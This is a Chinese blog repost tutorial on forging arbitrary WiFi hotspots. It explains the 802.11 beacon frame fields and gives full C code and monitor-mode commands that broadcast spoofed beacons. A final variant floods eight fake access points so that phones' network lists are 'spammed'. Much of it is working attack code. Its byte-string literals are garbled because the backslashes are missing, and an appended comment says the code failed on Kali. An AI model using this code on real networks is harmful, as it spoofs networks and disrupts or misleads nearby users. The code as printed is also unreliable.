首页 > 其他分享 >构造并发送Beacon帧以伪造任意WiFi热点

构造并发送Beacon帧以伪造任意WiFi热点

时间:2023-08-01 16:37:28浏览次数:37  
标签:socket buffer WiFi uint8 sll ap Beacon 伪造

  请想象一下这样的情景:你可以任意伪造很多个WiFi热点, 这个技术只能在linux上使用,而且对无线网卡也有一定的挑剔,具体的下面会讲~

  阶段一:基本原理

  首先需要搞清楚的是,手机、电脑等支持WiFi的设备,是如何得知周围无线热点的存在的?无线热点(通常就是无线路由器)会周期性地向外发送Beacon帧,中文名为信标帧。信标帧一个最重要的作用就是宣示无线网络的存在(但不仅仅这个作用)。

  信标帧里面包含了该无线热点的一些基本信息,比如ESSID(也就是常说的网络名称,比如上图中的“1.此广告位招租”)、BSSID(接入点的MAC地址)、加密方式(比如开放无密码、WEP加密或者WPA/WPA2加密)、支持的传输速率等等。

  当无线设备接收到信标帧之后,就能得知周围这个接入点的存在。那么,如果我能够构造一个Beacon帧并且发送出去,那么无线设备收到以后也一样会认为存在这么一个热点。那么当我构造很多个Beacon帧,每个帧都宣示一个接入点,并且周期性地发送这些帧,那么无线设备就会以为周边存在很多个接入点。

  这就是伪造任意WiFi热点的基本原理。

  阶段二:熟悉Beacon帧格式

  那么接下来的目标就很明晰了——构造Beacon帧。要构造Beacon帧,就得知道一个Beacon帧的格式。而在给出Beacon帧的格式之前,需要先说明一下802.11管理帧的通用格式:

  格式中每一个字段上面的数字是指该字段占用的字节数,比如Frame Control占用2字节,Destination Address占用6字节等等。

  一、Frame Control,中文名为帧控制字段,占2个字节,各个位的定义如下:

  (1)Protocol字段由两位构成,用以显示该帧所使用的版本号。目前802.11只有一个版本,编号为0。所以Protocol的值是00。

  (2)Type字段由两位构成,Sub type字段由4位构成。802.11帧共有三种类型的帧,分别是管理帧、控制帧与数据帧。而每种类型又分为多种子类型。Beacon帧的Type字段值为00(管理帧),而Sub type字段值为1000。

  (3)To DS位与From DS位用来指示帧的目的地是否为分布式系统,定义如下:

TO DS

FROM DS

含义

0

0

所有管理与控制帧、非基础结构型数据帧

0

1

基础结构型网络里无线工作站所收到的数据帧

1

0

基础结构型网络里无线工作站所传送的数据帧

1

1

无线桥接器上的数据帧

  由于Beacon帧属于管理帧,所以To DS与From DS都是0。

  (4)Mor Fragments位,类似于IP分包的more fragments位。因为802.11帧对负载有长度限制,所以当上层传入很大的数据时,需要分段传送。Beacon帧不需要分段,所以该位为0。

  (5)Retry位。有时需要重传帧,任何重传的帧都要将此位置为1,否则为0。Beacon帧不存在重传的情况,所以该位为0。

  (6)Power Management位。很多无线设备是以电池供电的,比如手机。当没有数据流量时,关闭无线发射器可以延长电池的使用时间。如果无线设备要把该位置为1,那么就意味着这个帧(或者这次数据交换)传送完成之后,无线设备将进入省电模式。由于接入点是不  允许进入省电模式的,所以Beacon帧的该位为0。

  (7)More data位。为了服务处于省电模式中的无线设备,接入点会将那些要传给无线设备的帧加以缓存。如果无线设备从省电模式中醒来之后,收到一个帧中发现该位置1,说明接入点还有更多的缓存的数据要发送给无线设备。如果只是为了伪造Beacon帧的话,那么这一位一直为0即可。

  (8)Protected Frame位如果被置为1的话,则说明该帧是受到链路层安全协议的保护的,比如WEP和WPA/WPA2。Beacon管理帧是不需要加密的,所以为0。

  (9)Order位如果被置位,那么就表明帧进入了严格依次传送模式,不过发送端与接收端必须付出额外的代价。Beacon帧的该位为0。

由此可得,我们构造的Beacon帧的Frame Control字段为0×80 0×00(按图中的顺序就是00000001,00000000,考虑高位在后,那么就是二进制的10000000,00000000,即0×80 0×00)。

  二、Duration字段在802.11帧中用来预约媒介占用时间。简单来说就是,每一个帧都会通过Duration字段来告知所有的无线设备:“我还要占用媒介多长时间!”。Duration字段保障了一系列原子操作不被打断,当然,前提是大家都遵守802.11协议~而Beacon帧属于广播,没有后续数据交互,所以其Duration为0,即0×00 0×00。

  三、Destination Address即为目的地址,为接收端的MAC地址。由于Beacon帧是广播帧,所以目的地址就是广播地址,即FF:FF:FF:FF:FF:FF。

  四、Source Address即为源地址,为发送端的MAC地址。发送端地址通常就是接入点的MAC地址,但是也有例外,比如中间加了一个中继器,那么发送端的MAC地址就是中继器的地址了。

  五、BSSID就是接入点的MAC地址了。

  六、Seq-ID(Sequence Control)字段中文名为顺序控制字段,它的低4位是分段编号,而高12位为顺序编号。帧片段之间的差异在于分段编号。第一个片段的编号为0,其后每个片段的分段编号依次加以,而它们的顺序编号相同。除了最后一个分段,所有分段的More data位都置位。由于Beacon帧通常不分段,所以低4位为0000,高12位为顺序编号。

  七、Frame body即为帧主体。如果该帧是数据帧,那么帧主题就是数据的有效载荷,如果是管理帧,那么通常是各种信息元素(将在下面讲解)。

  八、FCS,中文名帧校验序列,通常就是循环冗余校验码CRC。

  阶段三:熟悉Beacon帧主体Frame Body

  从上面的分析中可以看出,最重要的内容还是包含在Frame body中。管理帧的Frame body有若干信息元素构成。信息元素有固定长度的信息元素与可变长度的信息元素构成。固定长度的信息元素占用的字节数固定,比如Timestamp固定占用8字节。而可变长度的信息元素占用的字节数不确定,比如Beacon帧中表示网络名称的ESSID。信息元素也可分为必选信息元素与可选信息元素,Beacon帧的格式详见下图(引用自《802.11无线网络权威指南 第二版》):

  很复杂不是吗?既然我们只是要构造一个符合条件的,那么就从简处理,构造最简的Frame body即可,那么只需要包含必选的四个信息元素即可:Timestamp、Beacon interval、Capability info和SSID。

  一、Timestamp,占用8字节的时间戳可用来同步BSS中的无线设备。BSS的主定时器会定期传送目前已运行的微秒数。当计数器达到最大值时就会从0开始计数。对于长64位、可计数超过58万年的计数器,要从头开始计数,呵呵。

  二、Beacon interval,占用2字节,用来设定Beacon信号之间相隔多少时间单位。时间单位通常缩写为TU,代表1024微秒。Beacon interval通常会被设定为100个TU,大约每0.1秒发送一次Beacon信号。

  三、Capability info共16位,用来告知网络具备何种性能。每一个位各自代表一个标记,对应到网络所具备的某种特殊功能。工作站会使用这些通告数据来判断自己是否支持该BSS所有的功能。未实现性能通告中所有功能的工作站就无法加入该BSS。各位的定义如下(引用自《802.11无线网络权威指南 第二版》):

  (1)ESS置位则表示该网络是一个扩展服务集的基本结构型,也就是接入点通常创建的网络。IBSS与ESS互斥,如果IBSS置位,则该网络是独立基本服务器网络,也就是常说的无线网卡直连。

  (2)CF-Pollable与CF-Poll request为无竞争-轮询位,表示与省电模式相关的功能。工作站从省电模式醒来之后,可以向工作站轮询是否有缓存的帧。Poll即轮询的意思。对于接入点而言,这两位的组合代表的含义如下表:

CF-POLLABLE

CF-POLL REQUEST

含义

0

0

接入点并未支持点协调功能(point coordination function)

0

1

接入点使用PCF来传递,但并不支持轮询

1

0

接入点使用PCF来传递与轮询

1

1

保留,尚未使用

  (3)Privacy,保密性。如果将Privacy位设定为0,并且接下来没有WPA信息元素,那么该无线网络即为开放无密码。如果将该为设定为1,代表需要使用WEP以维持机密性。

  (4)Short Preamble,短前导码,802.11b规范新增此字段是为了支持高速直接序列扩频物理层。设定为1,代表此网络目前使用短前导码。0代表不使用此选型,并且在该BSS中禁止使用短前导码。802.11g规定使用短前导码,因此在依据802.11g标准所构建的网络中,此字段必须为1。

  (5)PBCC,封包二进制回旋码,802.11b规范新增此字段是为了支持高速直接序列扩频物理层。设定为1,代表此网络目前使用封包二进制回旋码调制机制,0代表不使用此选项并且在该BSS中禁止使用封包二进制回旋码。

  (6)Channel Agility,机动信道转换,此字段加入802.11b规范是为了支持高速直接序列扩频物理层。设定为1,代表此网络使用机动信道转换选项,0代表不使用此选项并且在该BSS中禁止使用机动信道转换。

  (7)Short Slot Time,该选项是802.11g规范新增的,设定为1代表使用较短的时隙。

  (8)DSSS-OFDM,该选项是802.11g规范新增的,设定为1代表使用DSSS-OFDM帧构造。

  如果我们要构造一个最简的Beacon帧,Capability info字段可以设为0×01 0×00,如果要变成WEP加密的,那么就可以设为0×11 0×00,当然,很多选项选不选无所谓。

  四、SSID,服务集标识符,是一个可变长的信息元素,也就是通常说的网络名称。可变长的信息元素的通用格式为:

  而SSID的Element ID是0。有些文档将SSID视为网络名称,因为网管人员通常以字符串来指定SSID。其实,SSID不过是由字节所形成的字符串,用来标示所属网络的BSSID。有些产品要求此字符串必须是以null(即0)结尾的ASCII字符串,虽然标准对此并无特别规范。SSID的长度介于0至32个字节之间。假如要伪造的热点的名词为“hello”,那么这个元素就应该为0,5,’h’,’e’,’l’,’l’,’o’。

  阶段四:编写代码构造Beacon帧

  由此,我们已经弄清了一个最简Beacon帧的每个细节,除了最后的校验码FCS。让我们来总结一下最后的Beacon帧的样子吧~举个例子,我想伪造一个开放的、名为”hello,carrot!”的、接入点MAC地址为ec:17:2f:2d:b6:b8的接入点,那么最简的Beacon帧应该这样:

字段


Frame Control

0×80 0×00

Duration

0×00 0×00

Destination Address

0xFF 0xFF 0xFF 0xFF 0xFF 0xFF

Source Address

0xEC 0×17 0x2F 0x2D 0xB6 0xB8

BSSID

0xEC 0×17 0x2F 0x2D 0xB6 0xB8

Seq-ID

低4位:0×0,高12位:帧序号

Timestamp

当前运行的微秒数

Beacon interval

0×64 0×00(100)

Capability info

0×01 0×00

SSID

0×00 0x0D ‘h’ ‘e’ ‘l’ ‘l’ ‘o’ ‘,’ ‘c’ ‘a’ ‘r’ ‘r’ ‘o’ ‘t’ ‘!’

FCS

循环冗余校验码,幸好驱动程序会自行计算

  很简洁吧~

  为了实现一定的动态性,有必要定义一个结构体,那么就来看看代码的实现吧~

  首先是一个接入点结构体的定义:

struct ap
{
    uint8 bssid[6];
    uint16 seq_id;
    uint8 essid_len;
    char essid[32];
};

 

  然后是struct ap的初始化函数:

void init_ap(struct ap* p_ap,uint8* p_bssid,char* p_essid)
{
    memcpy(p_ap->bssid,p_bssid,6);
    p_ap->seq_id=0;
    uint32 t_len=strlen(p_essid);
    if(t_len>32)
        t_len=32;
    p_ap->essid_len=t_len;
    memcpy(p_ap->essid,p_essid,t_len);
}

 

  最后是根据struct ap来构造beacon帧的函数:

uint16 create_beacon_frame(uint8* p_buffer,struct ap* p_ap)
{
    memcpy(p_buffer,"x80x00x00x00xFFxFFxFFxFFxFFxFF",10);
    memcpy(p_buffer+10,p_ap->bssid,6);
    memcpy(p_buffer+16,p_ap->bssid,6);
    p_buffer[22]=(uint8)(p_ap->seq_id&0xFF);
    p_buffer[23]=(uint8)((p_ap->seq_id>>8)&0xFF);
    p_ap->seq_id+=0x10;
    struct timeval t_time;
    gettimeofday(&t_time,0);
    uint64 t_timestamp=((uint64)t_time.tv_sec)*1000000+t_time.tv_usec;
    uint8 t_i;
    for(t_i=0;t_i<8;t_i++)
         p_buffer[24+t_i]=(uint8)((t_timestamp>>(t_i<<3))&0xFF);
    memcpy(p_buffer+32,"x64x00x01x00",4);
    p_buffer[36]=0;
    p_buffer[37]=p_ap->essid_len;
    memcpy(p_buffer+38,p_ap->essid,p_ap->essid_len);
    return 38+p_ap->essid_len;
}

 

  至于使用方法嘛,如下:

struct ap t_ap;
init_ap(&t_ap,(uint8*)"xECx17x2Fx2DxB6xB8","zjs");
uint8 t_buffer[256];
uint16 t_len=create_beacon_frame(t_buffer,&t_ap);

 

  这样就能在t_buffer中生成一个MAC地址为ec:17:2f:2d:b6:b8、名为zjs的beacon帧了。

  阶段五:发送Beacon帧

  构造了beacon帧,就差发送了。你以为直接创建一个socket就能发送了?太天真了!发送这一步真不简单啊,我也是看了aircrack-ng套件中的源码才知道怎么发送的。要让无线网卡发送原始的802.11帧,首先需要把无线网卡设置为monitor模式。把无线网卡设置为monitor模式可以使用ifconfig与iwconfig命令,当然,如果你想自己代码实现,可以参考ifconfig与iwconfig命令的源码。

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

 

  以上三句命令,依次是关闭wlan0、将wlan0设置为monitor模式和开启wlan0,记得要有管理员权限。

  设置为monitor模式之后,需要在自己的代码中创建绑定了wlan0的链路层原始套接字,次序依次为创建链路层套接字、找出wlan0的网卡编号、将原始套接字与wlan0绑定、将原始套接字设置为混杂模式,代码如下:

int32 create_raw_socket(char* p_iface)
{
    /* new raw socket */
    int32 t_socket=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
    if(t_socket<0)
    {
        perror("<create_raw_socket> socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)) failed!");
        return -1;
    }
    /* get the index of the interface */
    struct ifreq t_ifr;
    memset(&t_ifr,0,sizeof(t_ifr));
    strncpy(t_ifr.ifr_name,p_iface,sizeof(t_ifr.ifr_name)-1);
    if(ioctl(t_socket,SIOCGIFINDEX,&t_ifr)<0)
    {
        perror("<create_raw_socket> ioctl(SIOCGIFINDEX) failed!");
        return -1;
    }
    /* bind the raw socket to the interface */
    struct sockaddr_ll t_sll;
    memset(&t_sll,0,sizeof(t_sll));
    t_sll.sll_family=AF_PACKET;
    t_sll.sll_ifindex=t_ifr.ifr_ifindex;
    t_sll.sll_protocol=htons(ETH_P_ALL);
    if(bind(t_socket,(struct sockaddr*)&t_sll,sizeof(t_sll))<0)
    {
        perror("<create_raw_socket> bind(ETH_P_ALL) failed!");
        return -1;
    }
    /* open promisc */
    struct packet_mreq t_mr;
    memset(&t_mr,0,sizeof(t_mr));
    t_mr.mr_ifindex=t_sll.sll_ifindex;
    t_mr.mr_type=PACKET_MR_PROMISC;
    if(setsockopt(t_socket,SOL_PACKET,PACKET_ADD_MEMBERSHIP,&t_mr,sizeof(t_mr))<0)
    {
        perror("<create_raw_socket> setsockopt(PACKET_MR_PROMISC) failed!");
        return -1;
    }
    return t_socket;
}

  参数里的p_iface通常就是 wlan0 

  开启了monitor模式,又创建了原始套接字,是不是就能直接发送t_buffer了呢?too young too simple!还差一个radiotap头!我当时就被这个坑的不轻啊,后来看了aireply-ng的源码,又抓包,又百度,才大致明白radiotap的作用。在抓包的过程中,无线网卡会附上一个radiotap头,以展现与物理层有关的信息,比如功率、速率。而在发包的过程中,radiotap给无线网卡一定的参考信息。

  附加radiotap头并且发送数据包的函数如下:

int32 send_80211_frame(int32 p_socket,uint8* p_buffer,uint32 p_size)
{
    uint8 t_buffer[4096];
    uint8* t_radiotap=(uint8*)"x00x00x0dx00x04x80x02x00x02x00x00x00x00";
    memcpy(t_buffer,t_radiotap,13);
    memcpy(t_buffer+13,p_buffer,p_size);
    p_size+=13;
    int32 t_size=write(p_socket,t_buffer,p_size);
    if(t_size<0)
    {
        perror("<send_80211_frame> write() failed!");
        return -1;
    }
    return t_size;
}

   可以看到就是在生成的beacon帧之前加了13个字节。

  阶段六:整合、检验成果

  至此所有代码完成,以下是一份完整的代码:

#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <netpacket/packet.h>
#include <linux/if_ether.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <net/if.h>

typedef unsigned char bool;
typedef signed char int8;
typedef unsigned char uint8;
typedef signed short int16;
typedef unsigned short uint16;
typedef signed int int32;
typedef unsigned int uint32;
typedef signed long long int64;
typedef unsigned long long uint64;

struct ap
{
    uint8 bssid[6];
    uint16 seq_id;
    uint8 essid_len;
    char essid[32];
};

void init_ap(struct ap* p_ap,uint8* p_bssid,char* p_essid)
{
    memcpy(p_ap->bssid,p_bssid,6);
    p_ap->seq_id=0;
    uint32 t_len=strlen(p_essid);
    if(t_len>32)
        t_len=32;
    p_ap->essid_len=t_len;
    memcpy(p_ap->essid,p_essid,t_len);
}

uint16 create_beacon_frame(uint8* p_buffer,struct ap* p_ap)
{
    memcpy(p_buffer,"x80x00x00x00xFFxFFxFFxFFxFFxFF",10);
    memcpy(p_buffer+10,p_ap->bssid,6);
    memcpy(p_buffer+16,p_ap->bssid,6);
    p_buffer[22]=(uint8)(p_ap->seq_id&0xFF);
    p_buffer[23]=(uint8)((p_ap->seq_id>>8)&0xFF);
    p_ap->seq_id+=0x10;
    struct timeval t_time;
    gettimeofday(&t_time,0);
    uint64 t_timestamp=((uint64)t_time.tv_sec)*1000000+t_time.tv_usec;
    uint8 t_i;
    for(t_i=0;t_i<8;t_i++)
         p_buffer[24+t_i]=(uint8)((t_timestamp>>(t_i<<3))&0xFF);
    memcpy(p_buffer+32,"x64x00x01x00",4);
    p_buffer[36]=0;
    p_buffer[37]=p_ap->essid_len;
    memcpy(p_buffer+38,p_ap->essid,p_ap->essid_len);
    return 38+p_ap->essid_len;
}

int32 create_raw_socket(char* p_iface)
{
    /* new raw socket */
    int32 t_socket=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
    if(t_socket<0)
    {
        perror("<create_raw_socket> socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)) failed!");
        return -1;
    }
    /* get the index of the interface */
    struct ifreq t_ifr;
    memset(&t_ifr,0,sizeof(t_ifr));
    strncpy(t_ifr.ifr_name,p_iface,sizeof(t_ifr.ifr_name)-1);
    if(ioctl(t_socket,SIOCGIFINDEX,&t_ifr)<0)
    {
        perror("<create_raw_socket> ioctl(SIOCGIFINDEX) failed!");
        return -1;
    }
    /* bind the raw socket to the interface */
    struct sockaddr_ll t_sll;
    memset(&t_sll,0,sizeof(t_sll));
    t_sll.sll_family=AF_PACKET;
    t_sll.sll_ifindex=t_ifr.ifr_ifindex;
    t_sll.sll_protocol=htons(ETH_P_ALL);
    if(bind(t_socket,(struct sockaddr*)&t_sll,sizeof(t_sll))<0)
    {
        perror("<create_raw_socket> bind(ETH_P_ALL) failed!");
        return -1;
    }
    /* open promisc */
    struct packet_mreq t_mr;
    memset(&t_mr,0,sizeof(t_mr));
    t_mr.mr_ifindex=t_sll.sll_ifindex;
    t_mr.mr_type=PACKET_MR_PROMISC;
    if(setsockopt(t_socket,SOL_PACKET,PACKET_ADD_MEMBERSHIP,&t_mr,sizeof(t_mr))<0)
    {
        perror("<create_raw_socket> setsockopt(PACKET_MR_PROMISC) failed!");
        return -1;
    }
    return t_socket;
}

int32 send_80211_frame(int32 p_socket,uint8* p_buffer,uint32 p_size)
{
    uint8 t_buffer[4096];
    uint8* t_radiotap=(uint8*)"x00x00x0dx00x04x80x02x00x02x00x00x00x00";
    memcpy(t_buffer,t_radiotap,13);
    memcpy(t_buffer+13,p_buffer,p_size);
    p_size+=13;
    int32 t_size=write(p_socket,t_buffer,p_size);
    if(t_size<0)
    {
        perror("<send_80211_frame> write() failed!");
        return -1;
    }
    return t_size;
}

int32 main()
{
    struct ap t_ap1,t_ap2;
    init_ap(&t_ap1,(uint8*)"xECx17x2Fx2DxB6xB8","zjs ap 1");
    init_ap(&t_ap2,(uint8*)"xECx17x2Fx2DxB6xB9","zjs ap 2");
    uint8 t_buffer[1024];
    int32 t_socket=create_raw_socket("wlan0");
    while(1)
    {
        uint16 t_len=create_beacon_frame(t_buffer,&t_ap1);
        printf("%dn",send_80211_frame(t_socket,t_buffer,t_len));
        t_len=create_beacon_frame(t_buffer,&t_ap2);
        printf("%dn",send_80211_frame(t_socket,t_buffer,t_len));
        usleep(100000);
    }
    return 0;
}

  保存为~/beacon.c

  编译:

gcc beacon.c -o beacon

  执行(要有管理员权限):

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
./beacon

  执行后,控制台不断输出该帧实际写出长度,应该是不停地输出59。如果修改热点名字应该会相应改变。

  此时,打开手机,可以搜索到wifi热点“zjs ap 1”和“zjs ap 2”。如果没有,请耐心等待一会儿。 目前在K-Touch W68a(Android 4.2.2)、iPhone 6、vivo Y22L(Android 4.3)上都能搜索到热点,以图为证:

  当然,想玩狠一点的,比如这样:

#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <netpacket/packet.h>
#include <linux/if_ether.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <net/if.h>
 
typedef unsigned char bool;
typedef signed char int8;
typedef unsigned char uint8;
typedef signed short int16;
typedef unsigned short uint16;
typedef signed int int32;
typedef unsigned int uint32;
typedef signed long long int64;
typedef unsigned long long uint64;
 
#define AP_COUNT 8
 
struct ap
{
    uint8 bssid[6];
    uint16 seq_id;
    uint8 essid_len;
    char essid[32];
};
 
void init_ap(struct ap* p_ap,uint8* p_bssid,char* p_essid)
{
    memcpy(p_ap->bssid,p_bssid,6);
    p_ap->seq_id=0;
    uint32 t_len=strlen(p_essid);
    if(t_len>32)
        t_len=32;
    p_ap->essid_len=t_len;
    memcpy(p_ap->essid,p_essid,t_len);
}
uint16 create_beacon_frame(uint8* p_buffer,struct ap* p_ap)
{
    memcpy(p_buffer,"x80x00x00x00xFFxFFxFFxFFxFFxFF",10);
    memcpy(p_buffer+10,p_ap->bssid,6);
    memcpy(p_buffer+16,p_ap->bssid,6);
    p_buffer[22]=(uint8)(p_ap->seq_id&0xFF);
    p_buffer[23]=(uint8)((p_ap->seq_id>>8)&0xFF);
    p_ap->seq_id+=0x10;
    struct timeval t_time;
    gettimeofday(&t_time,0);
    uint64 t_timestamp=((uint64)t_time.tv_sec)*1000000+t_time.tv_usec;
    uint8 t_i;
    for(t_i=0;t_i<8;t_i++)
         p_buffer[24+t_i]=(uint8)((t_timestamp>>(t_i<<3))&0xFF);
    memcpy(p_buffer+32,"x64x00x01x00",4);
    p_buffer[36]=0;
    p_buffer[37]=p_ap->essid_len;
    memcpy(p_buffer+38,p_ap->essid,p_ap->essid_len);
    return 38+p_ap->essid_len;
}
 
int32 create_raw_socket(char* p_iface)
{
    /* new raw socket */
    int32 t_socket=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
    if(t_socket<0)
    {
        perror("<create_raw_socket> socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)) failed!");
        return -1;
    }
    /* get the index of the interface */
    struct ifreq t_ifr;
    memset(&t_ifr,0,sizeof(t_ifr));
    strncpy(t_ifr.ifr_name,p_iface,sizeof(t_ifr.ifr_name)-1);
    if(ioctl(t_socket,SIOCGIFINDEX,&t_ifr)<0)
    {
        perror("<create_raw_socket> ioctl(SIOCGIFINDEX) failed!");
        return -1;
    }
    /* bind the raw socket to the interface */
    struct sockaddr_ll t_sll;
    memset(&t_sll,0,sizeof(t_sll));
    t_sll.sll_family=AF_PACKET;
    t_sll.sll_ifindex=t_ifr.ifr_ifindex;
    t_sll.sll_protocol=htons(ETH_P_ALL);
    if(bind(t_socket,(struct sockaddr*)&t_sll,sizeof(t_sll))<0)
    {
        perror("<create_raw_socket> bind(ETH_P_ALL) failed!");
        return -1;
    }
    /* open promisc */
    struct packet_mreq t_mr;
    memset(&t_mr,0,sizeof(t_mr));
    t_mr.mr_ifindex=t_sll.sll_ifindex;
    t_mr.mr_type=PACKET_MR_PROMISC;
    if(setsockopt(t_socket,SOL_PACKET,PACKET_ADD_MEMBERSHIP,&t_mr,sizeof(t_mr))<0)
    {
        perror("<create_raw_socket> setsockopt(PACKET_MR_PROMISC) failed!");
        return -1;
    }
    return t_socket;
}
 
int32 send_80211_frame(int32 p_socket,uint8* p_buffer,uint32 p_size)
{
    uint8 t_buffer[4096];
    uint8* t_radiotap=(uint8*)"x00x00x0dx00x04x80x02x00x02x00x00x00x00";
    memcpy(t_buffer,t_radiotap,13);
    memcpy(t_buffer+13,p_buffer,p_size);
    p_size+=13;
    int32 t_size=write(p_socket,t_buffer,p_size);
    if(t_size<0)
    {
        perror("<send_80211_frame> write() failed!");
        return -1;
    }
    return t_size;
}
 
int32 main()
{
    struct ap t_aps[AP_COUNT];
    uint32 t_i;
    for(t_i=0;t_i<AP_COUNT;t_i++)
    {
        uint8 t_mac[6];
        char t_essid[32];
        memcpy(t_mac,"xECx17x2Fx2DxB6xB0",6);
        memcpy(t_essid,"zjs ap 0",9);
        t_mac[5]+=t_i;
        t_essid[7]+=t_i;
        init_ap(&t_aps[t_i],t_mac,t_essid);
    }
    int32 t_socket=create_raw_socket("wlan0");
    while(1)
    {
        for(t_i=0;t_i<AP_COUNT;t_i++)
        {
            uint8 t_buffer[1024];
            uint16 t_len=create_beacon_frame(t_buffer,t_aps+t_i);
            printf("%dn",send_80211_frame(t_socket,t_buffer,t_len));
        }
        usleep(100000);
    }
    return 0;
}

 

  结果可想而知,就是被刷屏咯

  kali系统亲测无效, 用wireshark捕获端口数据以后, 发现 数据格式有问题, 没有发送成功....

  参考:

    from:https://zhoujianshi.github.io/articles/2016/%E6%9E%84%E9%80%A0%E5%B9%B6%E5%8F%91%E9%80%81Beacon%E5%B8%A7%E4%BB%A5%E4%BC%AA%E9%80%A0%E4%BB%BB%E6%84%8FWiFi%E7%83%AD%E7%82%B9/index.html

 

厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

天道酬勤



标签:socket,buffer,WiFi,uint8,sll,ap,Beacon,伪造
From: https://blog.51cto.com/u_12304260/6923775

相关文章

  • X-Forwarded-For 客户端 IP 伪造过程及防范
    单号:【ID:1184794】【安全漏洞】【运营管理平台】【中危】存在IP地址伪造漏洞问题:漏洞名称:存在IP地址伪造漏洞漏洞等级:中危关联bug:漏洞描述:  应用系统存在IP地址伪造漏洞,攻击者可通过修改HTTP请求包伪造IP地址绕过IP地址限制,访问或执行系统相关功能。漏洞功能点:  ......
  • WIFI&蓝牙(ESP32)转CAN总线&串口TTL模块-A2-蓝牙和CAN总线透传通信(经典蓝牙主机)
    <p><iframename="ifd"src="https://mnifdv.cn/resource/cnblogs/ESP32_CAN"frameborder="0"scrolling="auto"width="100%"height="1500"></iframe></p>          实现的......
  • 记一次crack wifi的测试学习
    为了学习测试下crackwifi,参考了这篇文章:https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux (kali)也可以参考:https://gainanov.pro/eng-blog/sysad/wifi-cracking/ (但是jamWifi在较新的macos上已经不能deauthclient了,因此可能要结合别的方法。)中文的资料可以参考......
  • ubuntu wifi monitor
    ubuntu安装wifi抓包环境ubuntu安装wifi抓包环境1.wifi型号2.软件安装2.1wifi驱动确认已安装2.2查看wifi信息2.3安装软件3.配置wifi监听模式4.抓包4.1设定channel4.2wireshark过滤器4.3wireshark设置4.4抓包结果1.wifi型号intelAX2002.软件安......
  • Openwifi 开源项目解读(一)
    Openwifi是一个关于wifi系统的开源项目,是一个少有的优秀的关于wifi的开源项目,项目中包括了wifi的基带、lowmac、linux驱动等三部分,其中基带、lowmac部分是在FPGA中实现,wifi驱动部分是运行在Linux下,因此openwifi系统是一个运行在linux下的完整无线网卡实现版,因此对于希望学习w......
  • 4G/WiFi 无线传输物联网气动测量仪器 多通道 配云平台支持手机网页查看数据
       ......
  • android wifi GROUP_HANDSHAKE
    AndroidWifiGROUP_HANDSHAKE实现流程作为一名经验丰富的开发者,我将向你介绍如何实现"androidwifiGROUP_HANDSHAKE"。首先,让我们了解一下整个流程:步骤描述步骤1设置WifiDirect相关权限和功能步骤2搜索可用的WifiDirect网络步骤3连接到选定的Wif......
  • 华普物联WIFI串口服务器RS232/RS485转以太网/WIFI串口 河南华普 HPIOT
    提供串口转WIFI、串口转以太网、以太网转WIFI功能,能够将串口(RS232/485)转换成TCP/IP网络接口,实现串口(RS232/485)与WIFI/以太网的数据双向透明传输。使得串口设备能够立即具备TCP/IP网络接口功能,连接网络进行数据通信,极大的扩展串口设备的通信距离。公司介绍华普物联科技产品......
  • 树莓派CM4_Ultra扩展板硬件资源介绍原生千兆 2.5G以太网 USB3.0 WiFi6 5G SSD固态硬盘
    关键词:树莓派CM4  Ultra扩展板  原生千兆2.5G以太网  USB3.0  5G蜂窝WiFi6  SSD固态硬盘概述:CM4_Ultra扩展板是一款基于树莓派CM4核心板设计的PCIE扩展底板。本扩展板将CM4的原生PCIE接口通过PCIEPacketSwitch芯片一扩为四,分别用来连接M.2Akey接口的WiFi6、M.......
  • linux下wifi的sta和ap操作
    前言在linux开发中wifi是很常见的一个工作,wifi有STA模式和AP模式,今天分享下如何使用工具在Linux中控制wifi。作者:良知犹存转载授权以及围观:欢迎关注微信公众号:羽林君或者添加作者个人微信:become_me介绍今天介绍的是AP和STA的wifi模式控制,AP热点模式使用到了hostapd和轻量......